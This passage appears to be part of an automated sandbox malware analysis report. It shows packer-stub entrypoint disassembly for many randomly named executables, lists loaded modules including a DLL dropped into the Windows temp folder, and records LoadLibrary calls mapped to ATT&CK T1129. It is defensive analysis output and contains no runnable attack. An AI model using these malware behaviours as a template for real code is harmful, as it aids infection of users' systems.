\"xfvdbnh.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"blvvjn.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"fvbpf.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"ntpjj.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"644880.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"824246.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"02486.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"\n \"66842.exe\" file has an entrypoint instructions - \"pushal\t,mov\tesi, 0x41b000,lea\tedi, [esi - 0x1a000],push\tedi,mov\tebp, esp,lea\tebx, [esp - 0x3e80],xor\teax, eax,push\teax,cmp\tesp, ebx,jne\t0x424658,inc\tesi,inc\tesi,push\tebx,push\t0x22394,push\tedi,add\tebx, 4,push\tebx,push\t0x962f,push\tesi,add\tebx, 4,push\tebx,push\teax,mov\tdword ptr [ebx], 0x20003,nop\t,nop\t,nop\t,nop\t,nop\t,push\tebp,push\tedi,push\tesi,push\tebx,sub\tesp, 0x7c,mov\tedx, dword ptr [esp + 0x90],mov\tdword ptr [esp + 0x74], 0,mov\tbyte ptr [esp + 0x73], 0,mov\tebp, dword ptr [esp + 0x9c],\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"f9d3e68d1ad8a7056b334da864a4c65c94803ef5d9c34eee1a53b8b1d49209b2.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"lpdvdhr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"nrtffvl.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"npltvpp.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"llxjdlf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"rxrfxtr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"xhbff.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"vhppv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"hfbrlh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"brftth.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"2644808.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"vjvxf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"rxbdpdj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"jdfnf.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"llpbnv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"dtrvhhj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"lxdlb.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"fplntnd.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"xlfdrhv.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"nhjtnrr.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"4868486.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"42020.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"jjjvj.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"tljxh.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000\n \"vnvdx.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 75830000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"lpdvdhr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"lpdvdhr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"lpdvdhr.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"lpdvdhr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"lpdvdhr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"nrtffvl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"nrtffvl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nrtffvl.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"nrtffvl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"nrtffvl.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"llxjdlf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"llxjdlf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"llxjdlf.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"llxjdlf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"llxjdlf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"xhbff.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"xhbff.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xhbff.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"xhbff.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xhbff.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"xhbff.exe\" loaded module \"MSVCRT.DLL\" at base 761d0000\n \"xhbff.exe\" loaded module \"SHLWAPI.DLL\" at base 75930000\n \"xhbff.exe\" loaded module \"USER32.DLL\" at base 75990000\n \"xhbff.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"brftth.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"brftth.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"brftth.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"brftth.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"brftth.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"2644808.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"2644808.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2644808.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"2644808.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2644808.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"rxbdpdj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"rxbdpdj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"rxbdpdj.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"rxbdpdj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"rxbdpdj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"jdfnf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"jdfnf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jdfnf.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"jdfnf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jdfnf.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"jdfnf.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"llpbnv.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"dtrvhhj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"dtrvhhj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dtrvhhj.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"dtrvhhj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dtrvhhj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"dtrvhhj.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"xlfdrhv.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"xlfdrhv.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xlfdrhv.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"xlfdrhv.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xlfdrhv.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"nhjtnrr.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"jjjvj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"jjjvj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"jjjvj.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"jjjvj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"jjjvj.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"vnvdx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"vnvdx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"vnvdx.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"vnvdx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"vnvdx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"pxxhpb.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"pxxhpb.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pxxhpb.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"pxxhpb.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pxxhpb.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"4828644.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"4828644.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"4828644.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"4828644.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6680468.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"6680468.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"6680468.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"6680468.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"6680468.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"80426.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"80426.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"80426.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"80426.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"80426.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"80426.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"nhppdj.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"nhppdj.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"nhppdj.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"nhppdj.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"28408.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"28408.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"28408.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"28408.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"28408.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"4444446.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"40664.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"40664.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"40664.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"40664.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"40664.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"40664.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"bprdtlh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"bprdtlh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"bprdtlh.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"bprdtlh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"bprdtlh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"pbpbdlp.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"pbpbdlp.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pbpbdlp.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"pbpbdlp.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pbpbdlp.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"jvxvd.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"xbrvntf.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"xbrvntf.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xbrvntf.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"xbrvntf.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fvxvdn.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"fvxvdn.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"fvxvdn.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"fvxvdn.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"fvxvdn.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"ltjhnht.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"vpvxpp.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"llxxlrt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"llxxlrt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"llxxlrt.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"llxxlrt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"llxxlrt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"dfddlr.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"dfddlr.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"dfddlr.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"dfddlr.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"dfddlr.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"0806084.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"0806084.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"0806084.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"0806084.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"0806084.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"66842.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"66842.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"66842.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"66842.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"66842.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"02486.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"02486.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02486.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"02486.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02486.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"02486.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"824246.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"824246.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"824246.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"824246.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"824246.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"xfvdbnh.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"xfvdbnh.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xfvdbnh.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"xfvdbnh.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xfvdbnh.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"pfrdl.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"pfrdl.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"pfrdl.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"pfrdl.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"pfrdl.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"xtrhlt.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"xtrhlt.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"xtrhlt.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"xtrhlt.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"xtrhlt.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"drppx.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"drppx.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"drppx.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"drppx.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"drppx.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000\n \"drppx.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 752d0000\n \"2406002.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70820000\n \"2406002.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"2406002.exe\" loaded module \"KERNEL32\" at base 75f10000\n \"2406002.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"2406002.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6cc20000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"lpdvdhr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00004544)\n \"lpdvdhr.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00004544)\n \"nrtffvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005960)\n \"nrtffvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005960)\n \"nrtffvl.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005960)\n \"nrtffvl.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005960)\n \"llxjdlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003448)\n \"llxjdlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003448)\n \"llxjdlf.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003448)\n \"llxjdlf.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003448)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003612)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003612)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003612)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00003612)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter MSVCRT.dll (UID: 00000000-00003612)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter SHLWAPI.dll (UID: 00000000-00003612)\n \"xhbff.exe\" called \"LoadLibrary\" with a parameter USER32.dll (UID: 00000000-00003612)\n \"brftth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00003860)\n \"brftth.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00003860)\n \"brftth.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00003860)\n 